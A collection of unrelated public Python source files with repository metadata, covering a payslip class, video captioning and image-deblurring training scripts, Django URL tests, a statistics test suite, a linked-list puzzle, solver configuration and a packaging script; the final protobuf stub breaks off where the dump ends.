6d0218c02fd2a5f9dd00423791f0d95511b9be27 | 5ed2ef7a557ec4ba8835f47dc7ae110efc7901a3 | /advanced payslip generator.py | 2d767e86c41a499149afd840954c66c2dff298d3 | [] | no_license | 44858/records | 74caf42bf189aeaf32a6465d465ce20abf2e2ec2 | 4c20c35b4906466ba7a806121e1b1deb2ccf8551 | refs/heads/master | 2020-04-04T20:13:02.530928 | 2015-01-30T14:30:59 | 2015-01-30T14:30:59 | 29,735,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | #Lewis Travers
#30/01/2015
#Payslip Generator advanced
class Payslip:
def __init__(self):
self.name = None
self.number = None
self.hours = None
self.pay = None
payslips = []
def enter_values():
for count in range(15):
payslip = Payslip()
payslip.name = input("Please enter the name of the employee: ")
payslip.number = int(input("Please enter the employee's employee number: "))
payslip.hours = int(input("Please enter the number of hours worked by the employee: "))
payslip.pay = int(input("Please enter the pay per hour of the employee(in pounds): "))
payslips.append(payslip)
| [
"44858@PC004142.coll.lr.local"
] | 44858@PC004142.coll.lr.local |
7dfdda254e255ca9e99096ee203e40f5f0036550 | 20c4041b1c0c9ba5b129321be07be3feb83c0cb8 | /main/predict.py | e1a8a81c624ff69ac608eb805db0aa973922bd15 | [] | no_license | PelinSeloglu/GEVAP | ad807ed652169401c9ebe0be8c7bf0e03564d38f | 81a764012421b715c1d6d31e3776bd55afeaa6e9 | refs/heads/main | 2023-06-29T21:13:18.943069 | 2021-08-08T14:52:47 | 2021-08-08T14:52:47 | 393,968,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,347 | py | import os
import shutil
import glob
from pretrainedmodels import resnet152
import numpy as np
import pretrainedmodels.utils as util
import torch
import torch.nn as nn
import opts
from models import EncoderRNN, DecoderRNN, S2VTAttModel
import mix.utils as utils
import json
import cv2
from language import *
C, H, W = 3, 224, 224
def extract_frames(video, dst):
cap = cv2.VideoCapture(video)
i = 0
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = cv2.resize(frame, (400, 300))
cv2.imwrite(dst + '/' + 'kang' + str(i) + '.jpg', frame)
i += 1
cap.release()
cv2.destroyAllWindows()
def extract_feats(video_path):
C, H, W = 3, 224, 224
model = resnet152(pretrained='imagenet')
load_image_fn = util.LoadTransformImage(model)
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
model.last_linear = util.Identity()
model = nn.DataParallel(model)
model = model.cuda()
model.eval()
dir_fc = '../data/sample'
if not os.path.isdir(dir_fc):
os.mkdir(dir_fc)
print("save video feats to %s" % dir_fc)
video_id = video_path.split("/")[-1].split(".")[0]
print(video_id)
os.mkdir(dir_fc + '/' + video_id)
dst = '../data/sample/' + video_id
extract_frames(video_path, dst)
image_list = sorted(glob.glob(os.path.join(dst, '*.jpg')))
samples = np.round(np.linspace(0, len(image_list) - 1, 40))
image_list = [image_list[int(sample)] for sample in samples]
images = torch.zeros((len(image_list), C, H, W))
for iImg in range(len(image_list)):
img = load_image_fn(image_list[iImg])
images[iImg] = img
with torch.no_grad():
fc_feats = model(images.cuda()).squeeze()
img_feats = fc_feats.cpu().numpy()
# Save the inception features
outfile = os.path.join(dir_fc, video_id + '.npy')
np.save(outfile, img_feats)
# cleanup
shutil.rmtree(dst)
return img_feats
if __name__ == '__main__':
opt = opts.parse_opt()
opt = vars(opt)
opt['saved_model'] = '../data/save/model_10.pth'
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
encoder = EncoderRNN(opt["dim_vid"], opt["dim_hidden"], bidirectional=bool(opt["bidirectional"]),
# opt["bidirectional"] eski hali
input_dropout_p=opt["input_dropout_p"], rnn_dropout_p=opt["rnn_dropout_p"])
decoder = DecoderRNN(16860, opt["max_len"], opt["dim_hidden"], opt["dim_word"],
input_dropout_p=opt["input_dropout_p"],
rnn_dropout_p=opt["rnn_dropout_p"],
bidirectional=bool(opt["bidirectional"])) # opt["bidirectional"] eski hali
model = S2VTAttModel(encoder, decoder).cuda()
model.load_state_dict(torch.load(opt['saved_model']))
model.eval()
video_path = '../data/sample_video/video00.mp4'
image_feats = extract_feats(video_path)
fc_feat = torch.from_numpy(image_feats).type(torch.FloatTensor)
fc_feat = torch.unsqueeze(fc_feat, 0).cuda()
with torch.no_grad():
seq_probs, seq_preds = model(fc_feat, mode='inference', opt=opt)
vocab = json.load(open('../data/info.json'))['ix_to_word']
prediction = utils.decode_sequence(vocab, seq_preds)
speak_main(prediction)
print('Tahmin: ', prediction[0]) | [
"pelinseloglu@gmail.com"
] | pelinseloglu@gmail.com |
3db372c385c4b4645e4775a4a42beed4996904b5 | fc02c7226b3922d8c34e5b57e7426dd757d3186f | /test.py | 99747c20b27cadd1502b3779702d2a77e96a8eb9 | [] | no_license | RoseRollZhu/Lab2Pix-V2 | af2812b54ba3f7f8ae6846bae8f986b28f70d811 | 967ae52f149bee6200e6d21ba3e370b210c36d04 | refs/heads/main | 2023-04-06T18:27:22.443047 | 2021-04-16T07:11:49 | 2021-04-16T07:11:49 | 355,521,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | import os
from collections import OrderedDict
import data
from options.test_options import TestOptions
from trainers.pix2pix_trainer import Pix2PixTrainer
from util.visualizer import Visualizer
from util import html
import torch
opt = TestOptions().parse()
assert len(opt.gpu_ids) == 1
os.environ['MASTER_ADDR'] = opt.master_address
os.environ['MASTER_PORT'] = opt.master_port
torch.backends.cudnn.benchmark = True
torch.distributed.init_process_group(backend="nccl")
local_rank = torch.distributed.get_rank()
torch.cuda.set_device(local_rank)
dataloader = data.create_dataloader(opt)
trainer = Pix2PixTrainer(opt)
if local_rank == 0:
visualizer = Visualizer(opt)
# create a webpage that summarizes the all results
if local_rank == 0:
web_dir = os.path.join(opt.results_dir, opt.name,
'%s_%s' % (opt.phase, opt.which_epoch))
webpage = html.HTML(web_dir,
'Experiment = %s, Phase = %s, Epoch = %s' %
(opt.name, opt.phase, opt.which_epoch))
# test
for i, data_i in enumerate(dataloader):
if i * opt.batchSize >= opt.how_many:
break
generated = trainer.inference(data_i)
if local_rank == 0:
img_path = data_i['path']
for b in range(generated.shape[0]):
print('process image... %s' % img_path[b])
visuals = OrderedDict([
('input_label', data_i['label'][b]),
('synthesized_image', generated[b])
])
visualizer.save_images(webpage, visuals, img_path[b:b+1])
webpage.save()
| [
"junchen.zhu@hotmail.com"
] | junchen.zhu@hotmail.com |
bc3e3c9684f089084fe0fc0d38133f983ab268c3 | 42f4238073a70d1494537f8c8b07835b531e73a9 | /cases/3d/zalesak/ls_vortex_3d_n.py | 867bc7cb38211e8281f0cf96a2c44ce3c3bbcaba | [] | no_license | erdc/proteus-mprans | bd99257af7b3bbe08386533faf072dba22e93a61 | f8f4d20bc870b361c64c8ca2ceb99f045b373323 | refs/heads/master | 2022-09-11T13:18:39.973962 | 2022-08-11T16:27:29 | 2022-08-11T16:27:29 | 2,303,947 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,466 | py | from proteus import *
from proteus.default_n import *
from ls_vortex_3d_p import *
from vortex import *
nd = 3
if timeIntegration_ls == "BE":
timeIntegration = BackwardEuler_cfl
stepController = Min_dt_controller
#timeIntegration = VBDF
#stepController = Min_dt_cfl_controller
#timeOrder =2
elif timeIntegration_ls == "FLCBDF":
timeIntegration = FLCBDF
stepController = FLCBDF_controller
elif timeIntegration_ls == "RK":
if cDegree_ls == -1:
timeIntegration = LinearSSPRKPIintegration
else:
timeIntegration = LinearSSPRKintegration
stepController=Min_dt_RKcontroller
timeOrder = pDegree_ls+1
nStagesTime = timeOrder
else:
raise RuntimeError
if useHex:
if pDegree_ls == 1:
femSpaces = {0:C0_AffineLinearOnCubeWithNodalBasis}
elif pDegree_ls == 2:
femSpaces = {0:C0_AffineLagrangeOnCubeWithNodalBasis}#this is hardwired to p2 right now
else:
print "pDegree_ls = %s not recognized " % pDegree_ls
elementQuadrature = CubeGaussQuadrature(nd,vortex_quad_order)
elementBoundaryQuadrature = CubeGaussQuadrature(nd-1,vortex_quad_order)
else:
if pDegree_ls == 1:
femSpaces = {0:C0_AffineLinearOnSimplexWithNodalBasis}
elif pDegree_ls == 2:
femSpaces = {0:C0_AffineQuadraticOnSimplexWithNodalBasis}
else:
print "pDegree_ls = %s not recognized " % pDegree_ls
elementQuadrature = SimplexGaussQuadrature(nd,vortex_quad_order)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd-1,vortex_quad_order)
subgridError = None
subgridError = HamiltonJacobi_ASGS_opt(coefficients,nd,lag=True)
massLumping = False
numericalFluxType = None
shockCapturing = ResGradQuad_SC(coefficients,nd,shockCapturingFactor=shockCapturingFactor_ls,lag=True)
numericalFluxType = DoNothing
multilevelNonlinearSolver = Newton
levelNonlinearSolver = Newton
nonlinearSmoother = NLGaussSeidel
fullNewtonFlag = True
tolFac = 0.0
nl_atol_res = atolLevelSet
maxNonlinearIts = 50
matrix = SparseMatrix
if parallel:
multilevelLinearSolver = PETSc
levelLinearSolver = PETSc
linear_solver_options_prefix = 'ncls_'
linearSolverConvergenceTest = 'r-true'
else:
multilevelLinearSolver = LU
levelLinearSolver = LU
linTolFac = 0.001
conservativeFlux = {}
#checkMass = True
if not applyCorrection and checkMass:
auxiliaryVariables = [AuxiliaryVariables.ConservationHistoryLS("vortex3dnc"+`lRefinement`)]
| [
"IdoAkkerman@gmail.com"
] | IdoAkkerman@gmail.com |
7a452129eff32f63174f23daa3aaad8b876fbdff | 5dd58c23db7495b5c5882ba58f6e5a513baebffd | /lessons/my_iris_reader.py | d697c795865cc280f12a8aa0c0212d62e1916371 | [] | no_license | cra/rea-python101-for-da-in-econ | 649683bd3a5a88f54f51a9b3615660599f7e7af1 | a8c440038d512b328571dbbb5aa30f1c873469e7 | refs/heads/master | 2021-04-06T09:14:07.114201 | 2018-04-26T20:57:00 | 2018-04-26T20:57:00 | 124,781,250 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,039 | py | # coding: utf-8
import csv
import os
ALLOWED_IRIS_TYPES = ["Iris-setosa", "Iris-versicolor", "Iris-virginica"]
# TODO: import functools, использовать wraps чтобы сохранить help
def protect_iris(func):
def inner_f(*args, **kw):
try:
return func(*args, **kw)
except KeyError:
print("Знать что-то про такой Iris запрещено")
return inner_f
class IrisReader:
def __init__(self, fpath, ignore_type="Iris-virginica"):
self.fpath = fpath
self.ignore_type = ignore_type
self.stats = {}
self.read_stats_from_csv()
def read_stats_from_csv(self):
with open(self.fpath) as f:
n = 0
for row in csv.reader(f):
n += 1
if n == 1: # skip header
continue
s_len, s_width, p_len, p_width, name = row
if name == self.ignore_type:
continue
name = name.strip()
if name in self.stats:
self.stats[name]["sepalLength"].append(float(s_len))
self.stats[name]["sepalWidth"].append(float(s_width))
self.stats[name]["petalLength"].append(float(p_len))
self.stats[name]["petalWidth"].append(float(p_width))
else:
self.stats[name] = {
"sepalLength": [],
"sepalWidth": [],
"petalLength": [],
"petalWidth": [],
}
@property
def iris_types(self):
return self.stats.keys()
@protect_iris
def give_min(self, iris_type, feature=None):
if feature is not None:
return min(self.stats[iris_type][feature])
return [min(f) for f in self.stats[iris_type].values()]
@protect_iris
def give_max(self, iris_type, feature=None):
if feature is not None:
return max(self.stats[iris_type][feature])
return [
self.give_max(iris_type, f) for f in self.stats[iris_type].keys()
]
@protect_iris
def give_avg(self, iris_type, feature=None):
if feature is not None:
values = self.stats[iris_type][feature]
return sum(values) / len(values)
return [
self.give_avg(iris_type, f) for f in self.stats[iris_type].keys()
]
@protect_iris
def give_sma(self, iris_type, feature):
""" blablabla """
l = 3
smooth = []
values = self.stats[iris_type][feature]
for j in range(l - 1, len(values)):
i, tmp = 0, 0
while i < l:
tmp += values[j - i]/l
i += 1
smooth.append(tmp)
return smooth
if __name__ == "__main__":
r = IrisReader(os.path.join("..", "datasets", "iris.csv"), ignore_type='')
print("Привет")
print(r.give_avg("Iris-virginica"))
| [
"c6h10o5@gmail.com"
] | c6h10o5@gmail.com |
9b208b6430c836bcfb82db54923021aa68be7d56 | 149f2876d9a95933185521b22e3d2fa2f7358bb9 | /CNNDeblur/train.py | a2014e5f8cc27616108a310246792e4ea34724e0 | [] | no_license | LakshBhambhani/InterSTEM-ML-Research | 758affd8ef63dcf39e5cebe107efb3291630c96a | 277577223bb759d7620e74793449590c047acc95 | refs/heads/main | 2023-02-21T03:14:05.537193 | 2021-01-24T15:38:26 | 2021-01-24T15:38:26 | 316,973,819 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,176 | py | import tensorflow as tf
import numpy as np
from datetime import datetime
from imageio import imwrite
import glob
import os
class Model(object):
def __init__(self):
self.sess = tf.Session()
checkpoint_path = "training_1/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
# Create a callback that saves the model's weights
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1)
self.train_dataset, self.val_dataset = self.create_datasets()
self.train_init, self.val_init, self.input, self.target, self.output, self.loss, self.is_training = \
self.create_network()
self.train_summaries, self.val_summaries, self.summary_writer = self.create_summaries()
self.filename_pl, self.load_image_op = self.load_image()
self.global_step = tf.Variable(0, trainable=False, name='global_step', dtype=tf.int64)
self.optimizer = tf.train.AdamOptimizer(learning_rate=5e-4)
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step)
self.init = tf.global_variables_initializer()
def load_image(self):
filename = tf.placeholder(tf.string, shape=())
img = tf.read_file(filename)
img = tf.image.decode_image(img, channels=1)
img = tf.image.convert_image_dtype(img, dtype=tf.float32)
return filename, img
def create_summaries(self):
loss_summary = tf.summary.scalar('train/loss', self.loss)
validation_loss_summary = tf.summary.scalar('validation/validation_loss', self.loss)
train_summaries = [loss_summary]
train_summaries = tf.summary.merge(train_summaries)
val_summaries = tf.summary.merge([validation_loss_summary])
datestring = datetime.strftime(datetime.now(), '%m-%d_%H%M%S')
run_name = datestring
log_dir = "../logs/" + run_name + "/"
summary_writer = tf.summary.FileWriter(log_dir, self.sess.graph)
return train_summaries, val_summaries, summary_writer
@staticmethod
def map_data(filename, target_filename):
image = tf.read_file(filename)
image = tf.image.decode_image(image, channels=1)
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
target_image = tf.read_file(target_filename)
target_image = tf.image.decode_image(target_image, channels=1)
target_image = tf.image.convert_image_dtype(target_image, dtype=tf.float32)
return image, target_image
def create_datasets(self):
blurred_files = glob.glob('../data/blurred/*.png')
target_files = []
n_samples = len(blurred_files)
for i, f in enumerate(blurred_files):
target_f = f.replace('blurred', 'target')[:-6] + '.png'
target_files.append(target_f)
n_train_samples = int(0.8 * n_samples)
train_dataset = tf.data.Dataset.from_tensor_slices((blurred_files[:n_train_samples],
target_files[:n_train_samples]))
train_dataset = train_dataset.repeat().map(Model.map_data, num_parallel_calls=8)
val_dataset = tf.data.Dataset.from_tensor_slices((blurred_files[n_train_samples:],
target_files[n_train_samples:]))
val_dataset = val_dataset.map(Model.map_data, num_parallel_calls=8)
batch_size = 16
train_dataset = train_dataset.batch(batch_size=batch_size).prefetch(2)
val_dataset = val_dataset.batch(batch_size=batch_size)
return train_dataset, val_dataset
def create_network(self):
iter = tf.data.Iterator.from_structure(self.train_dataset.output_types,
self.train_dataset.output_shapes)
train_init = iter.make_initializer(self.train_dataset)
val_init = iter.make_initializer(self.val_dataset)
input, target = iter.get_next()
input = tf.reshape(input, shape=[-1, 28, 28, 1])
target = tf.reshape(target, shape=[-1, 28, 28, 1])
kernel_sizes = [7, 5, 3]
channel_numbers = [64, 64, 1]
is_training = tf.placeholder_with_default(True, shape=())
output = tf.layers.conv2d(input, channel_numbers[0], [kernel_sizes[0], kernel_sizes[0]], padding="same",
activation=tf.nn.relu)
output = tf.layers.dropout(output, rate=0.1, training=is_training)
for i in range(1, len(kernel_sizes[:-1])):
output = tf.layers.conv2d(output, channel_numbers[i], [kernel_sizes[i], kernel_sizes[i]], padding="same",
activation=tf.nn.relu)
output = tf.layers.dropout(output, rate=0.1, training=is_training)
output = tf.layers.conv2d(output, channel_numbers[-1], [kernel_sizes[-1], kernel_sizes[-1]], padding="same",
activation=None)
loss = tf.losses.mean_squared_error(labels=target, predictions=output)
return train_init, val_init, input, target, output, loss, is_training
def run_training(self):
self.sess.run(self.init)
saver = tf.train.Saver()
i = 0
while i<=1: #training for a limited number of cycles
self.train()
self.validate(i)
if i % 25 == 0:
self.test(i)
i += 1
saver.save(self.sess, 'my_test_model')
#save
def train(self, num_steps=250):
self.sess.run(self.train_init)
loss = 0.
for i in range(num_steps):
try:
_, l = self.sess.run([self.train_op, self.loss])
loss += l
except tf.errors.OutOfRangeError:
break
summ, step = self.sess.run([self.train_summaries, self.global_step], feed_dict={self.loss: loss / num_steps})
self.summary_writer.add_summary(summ, step)
def validate(self, i):
self.sess.run(self.val_init)
val_loss = 0
n = 0
while True:
try:
inp, targets, outp, l = self.sess.run([self.input, self.target, self.output, self.loss],
feed_dict={self.is_training: False})
val_loss += l
n += 1
if n > i or i % 25 != 0:
continue
path = '../data/val/{:05d}'.format(i)
os.makedirs(path, exist_ok=True)
for i in range(min(50, inp.shape[0])):
img = np.clip(inp[i], 0, 1) * 255.
pred = np.clip(outp[i], 0, 1) * 255.
target = np.clip(targets[i], 0, 1) * 255.
stacked_imgs = np.vstack([img, pred, target]).astype(np.uint8)
imwrite(os.path.join(path, "img_{:05d}.png".format(i)), stacked_imgs)
except tf.errors.OutOfRangeError:
break
print(i, "Val Loss: ", val_loss / n)
summ, step = self.sess.run([self.val_summaries, self.global_step], feed_dict={self.loss: val_loss / n})
self.summary_writer.add_summary(summ, step)
self.summary_writer.flush()
def test(self, i):
path = '../data/test/{:05d}'.format(i)
os.makedirs(path, exist_ok=True)
test_files = glob.glob('../data/test_images/*.png')
for i, f in enumerate(test_files):
img = self.sess.run(self.load_image_op, feed_dict={self.filename_pl: f})
img = np.reshape(img, newshape=[28, 28, 1])
pred = self.sess.run(self.output, feed_dict={self.input: [img], self.is_training: False})[0]
pred = np.clip(pred, 0, 1)
stacked_imgs = np.vstack([img, pred]) * 255
imwrite(os.path.join(path, "img_{:05d}.png".format(i)), stacked_imgs.astype(np.uint8))
if i > 500:
break
def main():
m = Model()
m.run_training()
if __name__ == '__main__':
main()
| [
"lakshbh@gmail.com"
] | lakshbh@gmail.com |
718209cd4e9b8129270bfd7cfce002ecbefdd48f | e49b654d3db99773390c5b9686df9c99fbf92b2a | /linked_lists/remove_nth_from_end.py | df9193a1a375cfc8ab394f07106bc5c85074e045 | [] | no_license | hao89/diary_of_programming_puzzles | 467e8264d0ad38768ba5ac3cfb45301293d79943 | 0e05d3716f28075f99bbd7b433d16a383209e57c | refs/heads/master | 2021-01-16T00:49:38.956102 | 2015-08-25T13:44:53 | 2015-08-25T13:44:53 | 41,692,587 | 1 | 0 | null | 2015-08-31T18:20:38 | 2015-08-31T18:20:36 | Python | UTF-8 | Python | false | false | 1,207 | py | """
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
| [
"me@davidadamojr.com"
] | me@davidadamojr.com |
5bf06775a401ac55bb8353e8ceb73f191ddf3fbd | 7f979acc529ce833014f82d0e1c4b98f5330a149 | /inferential/test/test_simple_mediation.py | 1f2100e5a2ce83c945e2a9ebd894a19e50b6e119 | [
"MIT"
] | permissive | eribean/RyStats | 4d12c8657203e0e2ab73439936ccdab0420a3d7b | 1cdd0ea55a074cc81e61d2845216f395ba095f10 | refs/heads/main | 2023-05-23T02:44:18.940487 | 2021-10-29T18:01:38 | 2021-10-29T18:01:38 | 386,011,559 | 9 | 1 | MIT | 2021-10-29T18:01:38 | 2021-07-14T16:50:53 | Python | UTF-8 | Python | false | false | 2,826 | py | import unittest
import numpy as np
from RyStats.inferential import simple_mediation
class TestSimpleMediation(unittest.TestCase):
"""Test Fixture for Simple Mediation."""
def test_total_mediation(self):
"""Testing total mediation."""
rng = np.random.default_rng(842574782795233252432)
coeff1 = -1.2
coeff2 = 2.3
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * mediator + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'], coeff2, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], 0.0, delta=0.02)
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'], 100, delta=1.0)
def test_no_mediation(self):
"""Testing no mediation."""
rng = np.random.default_rng(62098271062615234511)
coeff1 = -1.2
coeff2 = 2.3
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * independent + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'], 0.0, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], coeff2, delta=0.02)
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'], 0, delta=1.0)
def test_partial_mediation(self):
"""Testing partial mediation."""
rng = np.random.default_rng(62098271062615234511)
coeff1 = 1.2
coeff2 = 2.3
coeff3 = 0.76
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * mediator + coeff3 * independent + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'],
coeff2, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], coeff3, delta=0.02)
percent_mediated = 100 * (coeff1 * coeff2 / (coeff3 + coeff1 * coeff2))
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'],
percent_mediated, delta=1.0)
if __name__ == "__main__":
unittest.main() | [
"noreply@github.com"
] | noreply@github.com |
0ef17e43fef2010f460cdb99cec32546cff45256 | 1eb1cd97444baf7f6bcf01c06d5cd22ba4f8f02e | /sessionwiz/urls.py | 1e82d1c68c7d222c65a4d3defe82a48385072bf6 | [] | no_license | rreddy80/sessionwiz_models | 000f236d27e0cf453719a1afa508b9f264f057fc | a265bcd68f9646632a9a4b44a98f0ca1b9ed4a89 | refs/heads/master | 2020-04-06T07:09:09.884189 | 2016-05-10T16:15:56 | 2016-05-10T16:15:56 | 21,155,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^example/', include('example.urls', namespace='example')),
)
| [
"vramesh.reddy@gmail.com"
] | vramesh.reddy@gmail.com |
a06334c157b4ac4e6ccf865d6a746fd36b7580b1 | f69b92d327621cc14323e6d50d87daf90c4a826f | /setup.py | 526facdce7ba36f74727d3f46d57b87b8c7d4ae5 | [
"BSD-3-Clause"
] | permissive | MelbourneHighSchoolRobotics/mindpile | 4a2c06fcc7c7a01a8c17a450cbb3288b26a9142a | 9dd0a14ee336810c2b62826afff4da8719455ba0 | refs/heads/main | 2023-06-21T18:42:32.118860 | 2021-07-20T08:32:23 | 2021-07-20T08:41:46 | 285,460,404 | 2 | 0 | BSD-3-Clause | 2021-04-30T12:26:51 | 2020-08-06T03:09:27 | Python | UTF-8 | Python | false | false | 1,236 | py | import os.path
from setuptools import setup
REQUIRES_PYTHON = ">=3.9.0"
HERE = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(HERE, "README.md"), encoding="utf-8") as fid:
README = fid.read()
with open(os.path.join(HERE, "requirements.txt")) as fid:
REQUIREMENTS = [req for req in fid.read().split("\n") if req]
from mindpile import __version__
setup(
name="mindpile",
version=__version__,
description="Transpiles Mindstorms to ev3dev2 python.",
long_description=README,
long_description_content_type="text/markdown",
python_requires=REQUIRES_PYTHON,
url="https://github.com/MelbourneHighSchoolRobotics/mindpile",
author="Angus Trau, Richard Huang, Jackson Goerner, Peter Drew",
author_email="contact@angus.ws, me@huangrichard.com, jgoerner@outlook.com, peter@pdrew.com",
license="BSD-3-Clause",
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
],
packages=["mindpile"],
include_package_data=True,
install_requires=REQUIREMENTS,
entry_points={
"console_scripts": [
"mindpile=mindpile.main:main",
]
},
)
| [
"37640160+glipR@users.noreply.github.com"
] | 37640160+glipR@users.noreply.github.com |
0fad1a1ef57ca5dc37b1a8aac705575a661aafba | 5eadb550d0c12a39544885bd6cea7314052f3fba | /Files_exercise/lecture3.py | 2dec18eb98427def06b257f3bc468779852a3968 | [] | no_license | thebiochemguy/sre-class | 1b0730882bfe4a935398a083ee531b163d1504e4 | 4b7b72aa5f160e5028f899a1b25331482e162a77 | refs/heads/master | 2020-08-05T21:33:24.817480 | 2019-11-12T03:55:57 | 2019-11-12T03:55:57 | 212,719,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import re
phonenum=re.compile(r'(\d\d\d)-(\d\d\d-\d\d\d\d)')
search=phonenum.findall("my number is 123-456-2345-123-123-2342.")
print(search[0]) | [
"juan@workstation1.localdomain"
] | juan@workstation1.localdomain |
bffdd5605e70c0218027950b2a97ca075262aee1 | 66dead2e38d06f5ca06463d669515876f7eb1771 | /{{cookiecutter.project_name}}/tests/test_server/test_urls.py | abb5b5626aa423ead2e752d00c266d5a31417071 | [
"MIT"
] | permissive | viktortat/wemake-django-template | 349920117d008e545db162ea11c4235fdf4bf0df | 991bbb8b34ed4b705d38080caa1ffa3893362520 | refs/heads/master | 2020-03-21T10:32:01.894036 | 2018-06-22T09:41:22 | 2018-06-22T09:41:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | # -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
| [
"mail@sobolevn.me"
] | mail@sobolevn.me |
a18b2132c6645e3c3e8102f1e3acf82ca7ee3c73 | bc441bb06b8948288f110af63feda4e798f30225 | /tuna_service_sdk/model/easy_flow/task_pb2.pyi | 99c3f43d6dca4676b4ba29fcf6e453c206047933 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,667 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from google.protobuf.struct_pb2 import (
Struct as google___protobuf___struct_pb2___Struct,
)
from tuna_service_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from tuna_service_sdk.model.easy_flow.package_info_pb2 import (
PackageInfo as tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo,
)
from tuna_service_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Task(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class ConfigList(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Configs(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
path = ... # type: typing___Text
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
path : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
